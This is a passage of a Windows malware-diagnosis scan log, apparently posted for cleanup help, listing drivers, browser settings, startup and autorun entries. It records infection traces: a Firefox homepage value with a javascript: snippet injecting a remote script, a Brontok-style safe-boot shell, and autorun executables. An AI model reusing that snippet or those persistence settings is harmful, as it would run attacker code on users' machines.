-- (SYMNDISV) DRV - [2007-01-09 16:32:14 | 000,027,576 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMREDRV.SYS -- (SYMREDRV) DRV - [2007-01-09 16:32:14 | 000,012,984 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMDNS.SYS -- (SYMDNS) DRV - [2007-01-03 09:05:02 | 000,417,592 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCDrv.sys -- (SPBBCDrv) DRV - [2006-12-28 00:48:26 | 000,212,280 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\ProgramData\Symantec\Definitions\SymcData\idsdefs\20070108.003\IDSvix86.sys -- (IDSvix86) DRV - [2006-11-06 10:24:56 | 000,012,080 | ---- | M] (Lenovo Group Limited) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\PROCDD.SYS -- (PROCDD) DRV - [2006-11-02 09:30:54 | 001,781,760 | ---- | M] (Intel® Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\NETw3v32.sys -- (NETw3v32) Sterownik karty Intel(R) DRV - [2006-08-30 12:04:04 | 000,013,744 | ---- | M] (Lenovo Group Limited) [Kernel | System | Running] -- C:\Windows\System32\drivers\smiif32.sys -- (lenovo.smi) [color=#E56717]========== Standard Registry (SafeList) ==========[/color] [color=#E56717]========== Internet Explorer ==========[/color] IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://lenovo.live.com IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie IE - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://g.msn.com.pl/0SEPLPL/SAOS01?FORM=TOOLBR IE - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = [Binary data over 100 bytes] IE - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = my.daemon-search.com IE - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1 IE - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie IE - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 [color=#E56717]========== FireFox ==========[/color] FF - prefs.js..browser.search.selectedEngine: "DAEMON Search" FF - prefs.js..browser.startup.homepage: "http://my.daemon-search.com/|javascript:(function(){function%20a(o){var%20script=document.createElement('script'script.id='stylujDodajObrazki';script.type='text/javascript';script.src='http://stylistki.pl/scripts/dodajObrazki.js?'+(new%20Date()).getTime();o.body.appendChild(script);}a(document);})();"); FF - prefs.js..extensions.enabledItems: {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}:1.3.6 FF - prefs.js..extensions.enabledItems: {E2883E8F-472F-4fb0-9522-AC9BF37916A7}:1.6.2.103 FF - prefs.js..extensions.enabledItems: {82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}:5.3.0.7550 FF - prefs.js..extensions.enabledItems: wrc@avast.com:6.0.1203 FF - prefs.js..extensions.enabledItems: DTToolbar@toolbarnet.com:1.1.4.0024 FF - prefs.js..network.proxy.type: 0 FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32.dll () FF - HKLM\Software\MozillaPlugins\@google.com/npPicasa3,version=3.0.0: C:\Program Files\Google\Picasa3\npPicasa3.dll (Google, Inc.) FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\4.0.60531.0\npctrl.dll ( Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation) FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\wrc@avast.com: C:\Program Files\AVAST Software\Avast\WebRep\FF [2011-07-08 14:35:29 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 5.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2011-07-12 14:30:45 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 5.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2011-07-12 14:22:06 | 000,000,000 | ---D | M] [2011-04-02 18:52:42 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Max\AppData\Roaming\mozilla\Extensions [2011-07-12 14:30:52 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions [2011-04-30 22:03:44 | 000,000,000 | ---D | M] (Adblock Plus) -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d} [2011-06-08 22:14:38 | 000,000,000 | ---D | M] (Adobe DLM (powered by getPlus(R))) -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions\{E2883E8F-472F-4fb0-9522-AC9BF37916A7} [2011-07-11 13:14:19 | 000,000,000 | ---D | M] ("DAEMON Tools Toolbar") -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions\DTToolbar@toolbarnet.com [2011-07-12 14:30:53 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions\nostmp [2011-07-11 13:14:03 | 000,002,055 | ---- | M] () -- C:\Users\Max\AppData\Roaming\Mozilla\Firefox\Profiles\nx4xd3id.default\searchplugins\daemon-search.xml [2011-07-12 14:30:44 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions File not found (No name found) -- [2011-07-08 14:35:29 | 000,000,000 | ---D | M] (avast! WebRep) -- C:\PROGRAM FILES\AVAST SOFTWARE\AVAST\WEBREP\FF [2011-04-05 06:54:09 | 000,000,000 | ---D | M] (Microsoft .NET Framework Assistant) -- C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V3.5\WINDOWS PRESENTATION FOUNDATION\DOTNETASSISTANTEXTENSION [2011-07-08 09:50:30 | 000,142,296 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll [2010-01-01 10:00:00 | 000,002,767 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\allegro-pl.xml [2010-01-01 10:00:00 | 000,001,406 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\fbc-pl.xml [2010-01-01 10:00:00 | 000,000,917 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\merlin-pl.xml [2010-01-01 10:00:00 | 000,000,858 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\pwn-pl.xml [2010-01-01 10:00:00 | 000,001,183 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia-pl.xml [2010-01-01 10:00:00 | 000,001,683 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wp-pl.xml O1 HOSTS File: ([2006-09-18 23:41:30 | 000,000,761 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts O1 - Hosts: 127.0.0.1 localhost O1 - Hosts: ::1 localhost O2 - BHO: (no name) - {1E8A6170-7264-4D0F-BEAE-D42A53123C75} - C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\NppBHO.dll (Symantec Corporation) O2 - BHO: (SSVHelper Class) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll (Sun Microsystems, Inc.) O2 - BHO: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software) O2 - BHO: (Windows Live Toolbar Helper) - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\Program Files\Windows Live Toolbar\msntb.dll (Microsoft Corporation) O2 - BHO: (CPwmIEBrowserHelper Object) - {F040E541-A427-4CF7-85D8-75E3E0F476C5} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll (Lenovo Group Limited) O3 - HKLM\..\Toolbar: (DAEMON Tools Toolbar) - {32099AAC-C132-4136-9E9A-4E364A424E17} - C:\Program Files\DAEMON Tools Toolbar\DTToolbar.dll () O3 - HKLM\..\Toolbar: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software) O3 - HKLM\..\Toolbar: (Show Norton Toolbar) - {90222687-F593-4738-B738-FBEE9C7B26DF} - C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\UIBHO.dll (Symantec Corporation) O3 - HKLM\..\Toolbar: (Windows Live Toolbar) - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\Program Files\Windows Live Toolbar\msntb.dll (Microsoft Corporation) O3 - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\..\Toolbar\WebBrowser: (DAEMON Tools Toolbar) - {32099AAC-C132-4136-9E9A-4E364A424E17} - C:\Program Files\DAEMON Tools Toolbar\DTToolbar.dll () O3 - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\..\Toolbar\WebBrowser: (Windows Live Toolbar) - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\Program Files\Windows Live Toolbar\msntb.dll (Microsoft Corporation) O4 - HKLM..\Run: [] File not found O4 - HKLM..\Run: [avast] C:\Program Files\AVAST Software\Avast\avastUI.exe (AVAST Software) O4 - HKLM..\Run: [MSConfig] C:\Windows\System32\msconfig.exe (Microsoft Corporation) O4 - HKLM..\Run: [TrojanScanner] C:\Program Files\Trojan Remover\Trjscan.exe (Simply Super Software) O4 - HKU\S-1-5-21-3224443864-345457774-4058443421-1000..\Run: [Tok-Cirrhatus] File not found O7 - HKU\S-1-5-21-3224443864-345457774-4058443421-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145 O8 - Extra context menu item: &Windows Live Search - c:\Program Files\Windows Live Toolbar\msntb.dll (Microsoft Corporation) O8 - Extra context menu item: Add to Google Photos Screensa&ver - C:\Windows\System32\GPhotos.scr (Google Inc.) O8 - Extra context menu item: Wyślij obraz do urządzenia &Bluetooth... - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie_ctx.htm () O8 - Extra context menu item: Wyślij stronę do urządzenia &Bluetooth... - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm () O9 - Extra 'Tools' menuitem : ThinkVantage Password Manager... - {0045D4BC-5189-4b67-969C-83BB1906C421} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll (Lenovo Group Limited) O9 - Extra 'Tools' menuitem : Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll (Sun Microsystems, Inc.) O9 - Extra Button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm () O9 - Extra 'Tools' menuitem : @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm () O13 - gopher Prefix: missing O16 - DPF: {233C1507-6A77-46A4-9443-F871F945D258} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab (Shockwave ActiveX Control) O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_02-windows-i586.cab (Java Plug-in 1.6.0_02) O16 - DPF: {CAFEEFAC-0016-0000-0002-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_02-windows-i586.cab (Java Plug-in 1.6.0_02) O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_02-windows-i586.cab (Java Plug-in 1.6.0_02) O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1 O18 - Protocol\Handler\pure-go {4746C79A-2042-4332-8650-48966E44ABA8} - C:\Program Files\Common Files\Pure Networks Shared\puresp3.dll (Pure Networks, Inc.) O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation) O24 - Desktop WallPaper: C:\Users\Max\AppData\Roaming\Microsoft\Windows Photo Gallery\Tapeta z Galerii fotografii systemu Windows.jpg O24 - Desktop BackupWallPaper: C:\Users\Max\AppData\Roaming\Microsoft\Windows Photo Gallery\Tapeta z Galerii fotografii systemu Windows.jpg O31 - SafeBoot: AlternateShell - cmd-brontok.exe O32 - HKLM CDRom: AutoRun - 1 O32 - AutoRun File - [2006-09-18 23:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ] O33 - MountPoints2\{00f5a3a8-afda-11dd-95bf-001c259197e1}\Shell - "" = AutoRun O33 - MountPoints2\{00f5a3a8-afda-11dd-95bf-001c259197e1}\Shell\AutoRun\command - "" = D:\AutoRun.exe O33 - MountPoints2\{0d10055a-afce-11dd-afc8-001c259197e1}\Shell\AutoRun\command - "" = F:\EXPLORER.EXE O33 - MountPoints2\{0d10055a-afce-11dd-afc8-001c259197e1}\Shell\explore\Command - "" = F:\EXPLORER.EXE O33 - MountPoints2\{0d10055a-afce-11dd-afc8-001c259197e1}\Shell\open\Command - "" = F:\EXPLORER.EXE O33 - MountPoints2\{1e5b6524-80ff-11e0-8fe6-001f3addec02}\Shell\AutoRun\command - "" = D:\setup.exe O33 - MountPoints2\{362a80ba-abc8-11df-8161-806e6f6e6963}\Shell\AutoRun\command - "" = D:\fooool.exe O33 - MountPoints2\{362a80ba-abc8-11df-8161-806e6f6e6963}\Shell\explore\Command - "" = D:\fooool.exe O33 - MountPoints2\{362a80ba-abc8-11df-8161-806e6f6e6963}\Shell\open\Command - "" = D:\fooool.exe O33 - MountPoints2\{43694ecf-afdb-11dd-9fa3-001c259197e1}\Shell - "" = AutoRun O33 - MountPoints2\{43694ecf-afdb-11dd-9fa3-001c259197e1}\Shell\AutoRun\command - "" = D:\AutoRun.exe O33 - MountPoints2\{51726f53-a584-11df-b4d8-001f3addec02}\Shell\AutoRun\command - "" = D:\p3vwxx.exe O33 - MountPoints2\{51726f53-a584-11df-b4d8-001f3addec02}\Shell\open\Command - "" = D:\p3vwxx.exe O33 - MountPoints2\{608ca0a6-af10-11e0-ab70-001f3addec02}\Shell\AutoRun\command - "" = D:\p3vwxx.exe O33 - MountPoints2\{608ca0a6-af10-11e0-ab70-001f3addec02}\Shell\open\Command - "" = D:\p3vwxx.exe O33 - MountPoints2\{8993f188-70c6-11e0-a9e7-001f3addec02}\Shell\AutoRun\command - "" = C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL D:\kvqIox.exE O33 - MountPoints2\{8d4f1fa8-e989-11df-9695-001f3addec02}\Shell\AutoRun\command - "" = D:\p3vwxx.exe O33 - MountPoints2\{8d4f1fa8-e989-11df-9695-001f3addec02}\Shell\open\Command - "" = D:\p3vwxx.exe O33 - MountPoints2\{a446109a-42be-11de-9508-001f3addec02}\Shell\AutoRun\command - "" = C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL D:\HAIhAEp.ExE O33 - MountPoints2\{c71d00f1-ab91-11e0-8a57-001f3addec02}\Shell - "" = AutoRun O33 - MountPoints2\{c71d00f1-ab91-11e0-8a57-001f3addec02}\Shell\AutoRun\command - "" = E:\setup.exe O33 - MountPoints2\{d1151128-b2d6-11df-88f8-001f3addec02}\Shell\AutoRun\command - "" = D:\p3vwxx.exe O33 - MountPoints2\{d1151128-b2d6-11df-88f8-001f3addec02}\Shell\open\Command - "" = D:\p3vwxx.exe O33 - MountPoints2\{f0af448d-ea5d-11df-b240-001f3addec02}\Shell\AutoRun\command - "" = E:\p3vwxx.exe O33 - MountPoints2\{f0af448d-ea5d-11df-b240-001f3addec02}\Shell\open\Command - "" = E:\p3vwxx.exe O34 - HKLM BootExecute: (autocheck autochk *) - File not found O35 - HKLM\..comfile [open] -- "%1" %* O35 - HKLM\..exefile [open] -- "%1" %* O37 - HKLM\...com [@ = comfile] -- "%1" %* O37 - HKLM\...exe [@ = exefile] -- "%1" %* NetSvcs: FastUserSwitchingCompatibility - File not found NetSvcs: Ias - File not found NetSvcs: Nla - File not found NetSvcs: Ntmssvc - File not found NetSvcs: NWCWorkstation - File not found NetSvcs: Nwsapagent - File not found NetSvcs: SRService - File not found NetSvcs: WmdmPmSp - File not found NetSvcs: LogonHours - File not found NetSvcs: PCAudit - File not found NetSvcs: helpsvc - File not found NetSvcs: uploadmgr - File not found MsConfig - StartUpFolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^BTTray.lnk - C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe - (Broadcom Corporation.) MsConfig - StartUpFolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Digital Line Detect.lnk - C:\Program Files\Digital Line Detect\DLG.exe - (Avanquest Software ) MsConfig - StartUpFolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^LenovoRegistration.lnk - C:\SWTOOLS\LenovoWelcome\LenovoRegistration.cmd - () MsConfig - StartUpFolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk - C:\Program Files\McAfee Security Scan\2.0.181\SSScheduler.exe - (McAfee, Inc.) MsConfig - StartUpReg: [b]ACTray[/b] - hkey= - key= - C:\Program Files\ThinkPad\ConnectUtilities\ACTray.exe (Lenovo) MsConfig - StartUpReg: [b]ACWLIcon[/b] - hkey= - key= - C:\Program Files\ThinkPad\ConnectUtilities\ACWLIcon.exe (Lenovo) MsConfig - StartUpReg: [b]Adobe ARM[/b] - hkey= - key= - C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems Incorporated) MsConfig - StartUpReg: [b]Adobe Reader Speed Launcher[/b] - hkey= - key= - C:\Program Files\Adobe\Reader 10.0\Reader\Reader_sl.exe (Adobe Systems Incorporated) MsConfig - StartUpReg: [b]AMSG[/b] - hkey= - key= - C:\Program Files\ThinkVantage\AMSG\Amsg.exe (LENOVO) MsConfig - StartUpReg: [b]AwaySch[/b] - hkey= - key= - C:\Program Files\Lenovo\AwayTask\AwaySch.EXE (Lenovo Group Limited) MsConfig - StartUpReg: [b]BLOG[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]ccApp[/b] - hkey= - key= - C:\Program Files\Common Files\Symantec Shared\ccApp.exe (Symantec Corporation) MsConfig - StartUpReg: [b]ChomikBox[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]cssauth[/b] - hkey= - key= - C:\Program Files\Lenovo\Client Security Solution\cssauth.exe (Lenovo Group Limited) MsConfig - StartUpReg: [b]DiskeeperSystray[/b] - hkey= - key= - C:\Program Files\Diskeeper Corporation\Diskeeper\DkIcon.exe (Diskeeper Corporation) MsConfig - StartUpReg: [b]ehTray.exe[/b] - hkey= - key= - C:\Windows\ehome\ehtray.exe (Microsoft Corporation) MsConfig - StartUpReg: [b]EZEJMNAP[/b] - hkey= - key= - C:\Program Files\ThinkPad\Utilities\EZEJMNAP.EXE (Lenovo Group Ltd.) MsConfig - StartUpReg: [b]HotKeysCmds[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]IgfxTray[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]IPLA![/b] - hkey= - key= - C:\Program Files\ipla\ipla.exe (Redefine Sp z o.o.) MsConfig - StartUpReg: [b]iPlusManager[/b] - hkey= - key= - C:\Program Files\iPlus\iPlusChecker.exe () MsConfig - StartUpReg: [b]LenovoOobeOffers[/b] - hkey= - key= - c:\SWTOOLS\LenovoWelcome\LenovoOobeOffers.exe (lenovo) MsConfig - StartUpReg: [b]LPManager[/b] - hkey= - key= - C:\Program Files\Lenovo\LenovoCare\LPMGR.EXE (Lenovo Group Limited) MsConfig - StartUpReg: [b]nmapp[/b] - hkey= - key= - C:\Program Files\Pure Networks\Network Magic\nmapp.exe (Pure Networks, Inc.) MsConfig - StartUpReg: [b]Persistence[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]PWMTRV[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]Sidebar[/b] - hkey= - key= - C:\Program Files\Windows Sidebar\sidebar.exe (Microsoft Corporation) MsConfig - StartUpReg: [b]Skype[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]SunJavaUpdateSched[/b] - hkey= - key= - C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe (Sun Microsystems, Inc.) MsConfig - StartUpReg: [b]Symantec PIF AlertEng[/b] - hkey= - key= - C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe (Symantec Corporation) MsConfig - StartUpReg: [b]TPFNF7[/b] - hkey= - key= - C:\Program Files\Lenovo\NPDIRECT\TPFNF7SP.exe (Lenovo Group Limited) MsConfig - StartUpReg: [b]TPHOTKEY[/b] - hkey= - key= - C:\Program Files\Lenovo\HOTKEY\TPOSDSVC.exe (Lenovo Group Limited) MsConfig - StartUpReg: [b]TpShocks[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]TrackPointSrv[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]TVT Scheduler Proxy[/b] - hkey= - key= - C:\Program Files\Common Files\Lenovo\Scheduler\scheduler_proxy.exe (Lenovo Group Limited) MsConfig - StartUpReg: [b]Windows Defender[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]WMPNSCFG[/b] - hkey= - key= - C:\Program Files\Windows Media Player\wmpnscfg.exe (Microsoft Corporation) MsConfig - State: "services" - 2 MsConfig - State: "startup" - 1 SafeBootMin: AppMgmt - File not found SafeBootMin: Base - Driver Group SafeBootMin: Boot Bus Extender - Driver Group SafeBootMin: Boot file system - Driver Group SafeBootMin: File system - Driver Group SafeBootMin: Filter - Driver Group SafeBootMin: HelpSvc - Service SafeBootMin: NTDS - File not found SafeBootMin: PCI Configuration - Driver Group SafeBootMin: PEVSystemStart - Service SafeBootMin: PNP Filter - Driver Group SafeBootMin: Primary disk - Driver Group SafeBootMin: procexp90.Sys - Driver SafeBootMin: sacsvr - Service SafeBootMin: SCSI Class - Driver Group SafeBootMin: System Bus Extender - Driver Group SafeBootMin: WinDefend - C:\Program Files\Windows Defender\MpSvc.dll (Microsoft Corporation) SafeBootMin: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers SafeBootMin: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive SafeBootMin: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive SafeBootMin: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller SafeBootMin: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc SafeBootMin: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard SafeBootMin: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse SafeBootMin: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters SafeBootMin: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter SafeBootMin: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System SafeBootMin: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive SafeBootMin: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy SafeBootMin: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers SafeBootMin: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume SafeBootMin: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices SafeBootMin: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices SafeBootMin: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices SafeBootNet: AppMgmt - File not found SafeBootNet: Base - Driver Group SafeBootNet: Boot Bus Extender - Driver Group SafeBootNet: Boot file system - Driver Group SafeBootNet: File system - Driver Group SafeBootNet: Filter - Driver Group SafeBootNet: HelpSvc - Service SafeBootNet: Messenger - Service SafeBootNet: NDIS Wrapper - Driver Group SafeBootNet: NetBIOSGroup - Driver Group SafeBootNet: NetDDEGroup - Driver Group SafeBootNet: Network - Driver Group SafeBootNet: NetworkProvider - Driver Group SafeBootNet: NTDS - File not found SafeBootNet: PCI Configuration - Driver Group SafeBootNet: PEVSystemStart - Service SafeBootNet: PNP Filter - Driver Group SafeBootNet: PNP_TDI - Driver Group SafeBootNet: Primary disk - Driver Group SafeBootNet: procexp90.Sys - Driver SafeBootNet: rdsessmgr - Service SafeBootNet: sacsvr - Service SafeBootNet: SCSI Class - Driver Group SafeBootNet: Streams Drivers - Driver Group SafeBootNet: System Bus Extender - Driver Group SafeBootNet: TDI - Driver Group SafeBootNet: WinDefend - C:\Program Files\Windows Defender\MpSvc.dll (Microsoft Corporation) SafeBootNet: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers SafeBootNet: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive SafeBootNet: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive SafeBootNet: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller SafeBootNet: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc SafeBootNet: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard SafeBootNet: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse SafeBootNet: {4D36E972-E325-11CE-BFC1-08002BE10318} - Net SafeBootNet: {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClient SafeBootNet: {4D36E974-E325-11CE-BFC1-08002BE10318} - NetService SafeBootNet: {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTrans SafeBootNet: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters SafeBootNet: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter SafeBootNet: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System SafeBootNet: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive SafeBootNet: {50DD5230-BA8A-11D1-BF5D-0000F805F530} - Smart card readers SafeBootNet: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy SafeBootNet: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers SafeBootNet: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume SafeBootNet: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices SafeBootNet: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices SafeBootNet: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices [color=#E56717]========== Files/Folders - Created Within 60 Days ==========[/color] [2011-07-18 10:22:08 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Local\Adobe [2011-07-18 10:17:00 | 000,000,000 | ---D | C] -- C:\Muzyja [2011-07-17 17:45:21 | 000,000,000 | ---D | C] -- C:\Users\Max\Desktop\Originals [2011-07-15 21:23:31 | 000,518,144 | ---- | C] (SteelWerX) -- C:\Windows\SWREG.exe [2011-07-15 21:23:31 | 000,406,528 | ---- | C] (SteelWerX) -- C:\Windows\SWSC.exe [2011-07-15 21:23:31 | 000,212,480 | ---- | C] (SteelWerX) -- C:\Windows\SWXCACLS.exe [2011-07-15 21:23:31 | 000,060,416 | ---- | C] (NirSoft) -- C:\Windows\NIRCMD.exe [2011-07-15 21:23:22 | 000,000,000 | ---D | C] -- C:\Windows\ERDNT [2011-07-15 21:23:19 | 000,000,000 | --SD | C] -- C:\ComboFix [2011-07-15 21:23:15 | 000,000,000 | ---D | C] -- C:\Qoobox [2011-07-15 21:23:01 | 000,000,000 | --SD | C] -- C:\32788R22FWJFW [2011-07-15 21:16:11 | 000,000,000 | ---D | C] -- C:\Program Files\Trend Micro [2011-07-15 21:16:11 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HiJackThis [2011-07-15 21:13:47 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\Safer Networking [2011-07-15 21:13:22 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Safer Networking [2011-07-15 21:13:21 | 000,000,000 | ---D | C] -- C:\Program Files\Safer Networking [2011-07-15 21:00:17 | 